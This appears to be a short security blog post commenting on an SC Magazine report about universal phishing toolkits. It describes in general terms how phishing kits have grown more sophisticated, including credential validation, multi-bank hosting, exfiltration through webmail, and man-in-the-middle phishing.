SC Mag has a little write up on a very interesting trend in the phishing world. They are called Universal Phishing Toolkits.
From past experience with PIRT, I can tell you..that this idea is nothing good.
Around 2 years ago, I started to see fake Paypal sites that would produce login errors when given fake login information. At first, this was quite shocking to me.
I told one of my other security friends about this trend and he told me of a simple script tool that was being used that could read in a username/pass file and check them all against Paypal.
If a separate tool existed to filter out fake login information, then it was only a matter of time before this matured and was inserted into a phishing kit. This is no longer the exception, it is the rule.
In just a matter of years, Phishing kits moved from infancy to fully adulthood. Years ago, you would find one bank phishing site on hijacked server...that was the norm. Now it is not uncommon to find phishing sites for 3 or 4 different banks/groups on one server - all of which are part of one phishing kit.
Also, phishing kits commonly use simple scripts on the backend to send the stolen information to the bad guys via free web-based e-mail systems. Hotmail, Gmail and Yahoo are very common.
This helps keep the phishing kit small and mobile.
Some phishing sites will attempt to exploit an IE vulnerability or inject malware, but these actions only draw attention to the phishing site...and in the end, they only reduce its uptime.
However, times are changing again and this article from SC makes it like sound these phishing gangs are taking it to the next level.
Full on MiTM phishing for any site...
No comments:
Post a Comment